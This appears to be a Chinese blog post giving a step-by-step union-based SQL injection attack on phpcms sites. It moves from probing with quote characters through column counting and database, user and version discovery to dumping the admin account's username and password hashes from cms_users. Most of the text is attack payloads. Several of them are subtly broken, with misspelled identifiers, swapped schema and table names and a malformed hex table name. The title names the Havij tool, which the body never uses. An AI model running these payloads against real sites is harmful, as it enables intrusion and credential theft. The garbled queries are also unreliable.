当前位置: 首页 > 工具软件 > Havij > 使用案例 >

Sql注入工具php,phpcms框架SQL注入--基于Havij工具

郭志
2023-12-01

sql注入的步骤:

1.首先观察网站是通过GET还是POST方式传输数据的:

a.如果是GET传输,则在url中输入?id=1' 或者 " 或者 ') 来测试是否存在sql注入。

b.如果是POST传输,则在输入框中输入?id=1' 或者 " 或者 ') 来测试是否存在sql注入。

2.测试完成发现存在注入,进行注入,先测试有多少表单:

a.?id=1 order by *(*数字为数字)进行测试,

3.测试完表单,进行表单查询:

a.?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --+

(得到回显的表单)

4.测完回显的数据,就可以进行查询了:

a.查询当前数据库:?id=1 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15 --+

b.查询用户名:?id=1 and 1=2 union select 1,2,user() ,4,5,6,7,8,9,10,11,12,13,14,15 --+

c.查询数据库版本:?id=1 and 1=2 union select 1,2,version() ,4,5,6,7,8,9,10,11,12,13,14,15 --+

d.查询全文件位置:?id=1 and 1=2 union select 1,2,@@datadir,4,5,6,7,8,9,10,11,12,13,14,15 --+

5.得到以上数据,进行全局查询:

a.查询数据库:?id=1 and 1=2 union select 1,2,group_concat(convert(tabal_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15  from information_schema.SCHEMATA

b.查询数据库表:?id=1 and 1=2 union select 1,2,group_concat(convert(SCHEMA_HAME using

latin1)),4,5,6,7,8,9,10,11,12,13,14,15  from information_schema.tabales where table _schema=database()    (查询database()中的表)

c.查询数据表中的列:?id=1 and 1=2 union select 1,2,group_concat(convert(column_name using

latin1)),4,5,6,7,8,9,10,11,12,13,14,15  from information_schema.columns where table _name=0x636D735F75736557273(CMS USER)  # 表名需要编码为16进制

d.查询管理员账号和密码:?id= 1 and 1=2 union select 1,2,concat_ws(0x2b,userid,username,password),4,5,6,7,8,9,10,11,12,13,14,15  from cms.cms_users

 类似资料: